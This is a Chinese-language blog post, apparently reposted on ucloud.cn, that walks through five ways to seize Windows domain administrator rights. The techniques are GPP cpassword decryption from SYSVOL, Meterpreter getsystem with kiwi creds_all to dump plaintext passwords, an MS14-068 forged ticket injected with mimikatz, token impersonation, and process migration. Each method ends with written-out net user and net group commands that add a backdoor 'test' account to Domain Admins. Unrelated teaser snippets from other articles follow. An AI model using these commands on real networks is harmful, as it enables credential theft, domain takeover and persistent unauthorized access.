摘要:本文分享几种常见的获取域管理员权限的方式。第种方式利用漏洞获取域管理权限是域内的共享文件夹,用来存放登录脚本组策略脚本等信息。入侵域管理员所在的服务器,窃取域管理员的令牌,从而控制整个域。
在不考虑直接攻击域控的情况下,如何快速获取域管理员权限呢?
在大多数情况下,攻击者可以通过定位域管理员所登录的服务器,利用漏洞获取服务器system权限,找到域管理的账号、进程或是身份验证令牌,从而获取域管理员权限。本文分享几种常见的获取域管理员权限的方式。
第1种方式:利用GPP漏洞获取域管理权限
SYSVOL是域内的共享文件夹,用来存放登录脚本、组策略脚本等信息。当域管理员通过组策略修改密码时,在脚本中引入用户密码,就可能导致安全问题。
(1)访问SYSVOL共享文件夹,搜索包含“cpassword”的XML文件,获取AES加密的密码。
(2)使用kali自带的gpp-decrypt进行破解,从而获取域账号密码,直接登录域管理员账号获取访问权限。
第2种方式:获取服务器明文登录密码
使用kiwi模块需要system权限,所以我们在使用该模块之前需要将当前MSF中的shell提升为system。提到system有两个方法,一是当前的权限是administrator用户,二是利用其它手段先提权到administrator用户。然后administrator用户可以直接getsystem到system权限。
meterpreter > getuidServer username: BYPASS-E97BA3FC/Administratormeterpreter > getsystem ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).meterpreter > getuidServer username: NT AUTHORITY/SYSTEM
加载kiwi模块
load kiwi
列举系统中的明文密码
creds_all
第3种方式:使用MS14-068漏洞进行提权
MS14068是一个能够使普通用户提权到域控权限的权限提升漏洞。攻击者可以通过构造特定的请求包来达到提升权限的目的。
攻击流程:
第一步:利用MS14-068伪造生成TGT
MS14-068.exe -u bypass@test.com -p abc123! -s S-1-5-21-735015318-3972860336-672499796 -d dc.test.com
第二步:利用mimikatz将工具得到的TGT票据写入内存,创建缓存证书
mimikatz#kerberos::ptc TGT_bypass@test.com.ccache
第三步:获取域管理员权限。创建一个 test 账号并加入域管理员组,从而随时可以登录域控主机进行操作。
PsExec.exe //dc cmd.exe// 添加test用户net user test abc123! /add /domain// 把 test 用户添加进域管理员组net group "domain admins" test /add /domain// 查看域管理员net group "domain admins" /domain
第4种方式:窃取域管理员令牌
当有域控账户登陆至服务器时可使用令牌模拟进行渗透取得域控权限。
1、入侵域管理员所在的服务器,窃取域管理员的令牌,从而控制整个域。
2、直接在meterpreter shell
上执行添加域管理员
add_user test abc123! -h 域控的IP地址add_group_user "Domain Admins" test -h 域控IP地址
第5种方式:进程迁移
入侵了域管理员所登录的服务器,将进程迁移到域管理员所运行的进程,就可以获得域管理员权限。
1、获取域管理员列表
net group "Domain Admins" /domain
2、利用ps找到域管理员(TEST/bypass)所运行的进程,然后将shell进程迁移到域管理员所运行的进程中,成功后就获得了域管理员权限。如下图所示:
3、输入shell命令获取OS shell,在本机上使用Windows命令添加新的域管理员:
// 添加test用户net user test admin@123 /add /domain// 把 test 用户添加进域管理员组net group "domain admins" test /add /domain
4、成功添加了域管理员账号test。
文章版权归作者所有,未经允许请勿转载,若此文章存在违规行为,您可以联系管理员删除。
转载请注明本文地址:https://www.ucloud.cn/yun/122468.html
摘要:如下图注意,这里不是函数的循环调用,是对象的相互依赖关系。因此如果在创建过程中发现自己已经在当前创建池里时将抛出异常表示循环依赖而对于创建完毕的将从当前创建池中清除掉。 showImg(https://segmentfault.com/img/bVbs5kw?w=339&h=193); 什么是循环依赖? 循环依赖其实就是循环引用,也就是两个或则两个以上的bean互相持有对方,最终形成闭...
摘要:虽然和都可以获取组件实例,但是它们无法在跨级或兄弟间通信,这是它们的缺点。也就是在父组件中提供一个值,并且在需要使用的子孙组件中注入改值,即不仅仅是,只要是的子组件,无论隔多少代,都可以通过这个的方式注入。通过混入组件,实现组件间的通信。 写在前面 vue 的组件化应该是其最核心的思想了,无论是一个大的页面还是一个小的按钮,都可以被称之为组件。基于 Vue 的开发,就是在写一个个组件,...
摘要:具有不可分割性即原语的执行必须是连续的,在执行过程中不允许被中断。提供服务主要就是通过数据结构原语集机制达到的。子节点的版本号数据节点版本号版本号创建该节点的会话的。后位则为递增序列。 前言 最近加入了部门的技术兴趣小组,被分配了Zookeeper的研究任务。在研究过程当中,发现Zookeeper由于其开源的特性和其卓越的性能特点,在业界使用广泛,有很多的应用场景,而这些不同的应用场景...
摘要:什么是跨域要明白什么是跨域之前,首先要明白什么是同源策略同源策略就是用来限制从一个源加载的文档或脚本与来自另一个源的资源进行交互。最后,解决跨域问题还有一个更通用更强大的方法,我单独把它拿出来总结了一篇文章跨域问题的根本解决方案。 什么是跨域? 要明白什么是跨域之前,首先要明白什么是同源策略? 同源策略就是用来限制从一个源加载的文档或脚本与来自另一个源的资源进行交互。那怎样判断是否是同...
摘要:它提供自动身份验证单点登录。对于真实用户,更需要或身份验证。此外,如果从外部世界访问数据库服务器,则使用证书加密会话以避免数据包嗅探很有用。这种身份验证方法称为代理身份验证。 showImg(https://segmentfault.com/img/remote/1460000018887928); 来源 | 愿码(ChainDesk.CN)内容编辑 愿码Slogan | 连接每个程...
阅读 2507·2021-11-25 09:43
阅读 1888·2021-11-18 13:25
阅读 1881·2021-11-15 11:38
阅读 3296·2021-10-14 09:43
阅读 1907·2021-10-14 09:42
阅读 3682·2021-09-22 15:52
阅读 1510·2021-09-22 15:49
阅读 1989·2019-08-30 15:54